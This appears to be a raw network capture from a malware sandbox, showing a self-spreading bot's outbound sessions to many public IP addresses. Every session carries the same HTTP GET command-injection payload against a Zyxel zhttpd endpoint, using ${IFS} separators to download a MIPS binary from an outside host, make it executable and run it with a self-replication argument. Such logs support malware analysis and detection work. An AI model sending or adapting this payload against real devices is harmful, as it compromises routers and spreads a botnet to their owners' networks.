                                            Jan 14, 2024 15:50:34.330137014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2946192.168.2.2349786191.212.208.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.330168009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2947192.168.2.2349470219.237.191.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.330193996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2948192.168.2.2335814166.162.154.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.330231905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2949192.168.2.2357226199.30.217.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.330262899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2950192.168.2.2334928173.171.228.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.330272913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2951192.168.2.234097032.182.78.84443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.330292940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2952192.168.2.2354778119.173.4.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.330348969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2953192.168.2.2345808176.0.100.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.330374956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2954192.168.2.234631853.138.31.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.330409050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2955192.168.2.23412105.159.243.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.330427885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2956192.168.2.235408053.120.41.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.330427885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2957192.168.2.234322069.140.6.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.330468893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2958192.168.2.2349638184.126.39.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.333554029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2959192.168.2.235467268.29.0.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.333580971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2960192.168.2.2339246161.34.128.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.333619118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2961192.168.2.2333176152.101.155.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.333667040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2962192.168.2.235773087.20.145.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.333674908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2963192.168.2.2353704202.219.177.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.333713055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2964192.168.2.2354582191.34.8.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.333740950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2965192.168.2.2337048117.129.5.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.333794117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2966192.168.2.2333430102.199.203.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.333798885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2967192.168.2.235288834.205.148.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.333825111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2968192.168.2.234430667.178.206.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.333873034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2969192.168.2.2340250132.198.250.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.333923101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2970192.168.2.2359944103.122.108.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.333940983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2971192.168.2.2352358221.177.179.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.333951950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2972192.168.2.233989093.176.59.10443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.334006071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2973192.168.2.234031278.91.34.59443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.334013939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2974192.168.2.2333242124.27.81.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.334038973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2975192.168.2.2338158102.112.29.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.334086895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2976192.168.2.2360282182.124.14.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.334111929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2977192.168.2.2339570104.143.115.249443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.334140062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2978192.168.2.2348296194.69.165.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.334178925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2979192.168.2.2345406108.56.165.134443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.334203959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2980192.168.2.234721068.83.22.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.334224939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2981192.168.2.2341702193.2.16.41443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.334254980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2982192.168.2.2338984211.89.150.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.327925920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2983192.168.2.235743065.99.224.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.328007936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2984192.168.2.2335982179.60.111.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.328033924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2985192.168.2.233807669.3.84.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.328049898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2986192.168.2.2337674107.87.201.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.328058958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2987192.168.2.2360130101.163.54.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.328080893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2988192.168.2.2357436167.179.90.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.328129053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2989192.168.2.2341886157.223.147.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.328156948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2990192.168.2.235922464.246.164.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.328196049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2991192.168.2.2344306177.59.115.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.328233004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2992192.168.2.233681439.143.101.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.328325987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2993192.168.2.234321688.82.106.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.328349113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2994192.168.2.235849478.91.29.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.328385115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2995192.168.2.2356110147.180.8.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.328417063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2996192.168.2.234230024.125.94.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.328433037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2997192.168.2.235108445.224.222.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.328480005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2998192.168.2.2353844106.233.164.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.328480959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2999192.168.2.233648213.187.159.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.328530073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3000192.168.2.233648023.209.101.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.328553915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3001192.168.2.2360256124.93.46.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.328608036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3002192.168.2.2340934108.47.80.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.328639984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3003192.168.2.2356652141.117.42.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.328660965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3004192.168.2.233720465.34.49.5443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.328705072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3005192.168.2.2339400192.150.21.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.328726053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3006192.168.2.2348292192.20.40.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.328766108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3007192.168.2.233723425.136.17.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.328803062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3008192.168.2.233620624.47.65.65443
                                            TimestampBytes transferredDirectionData
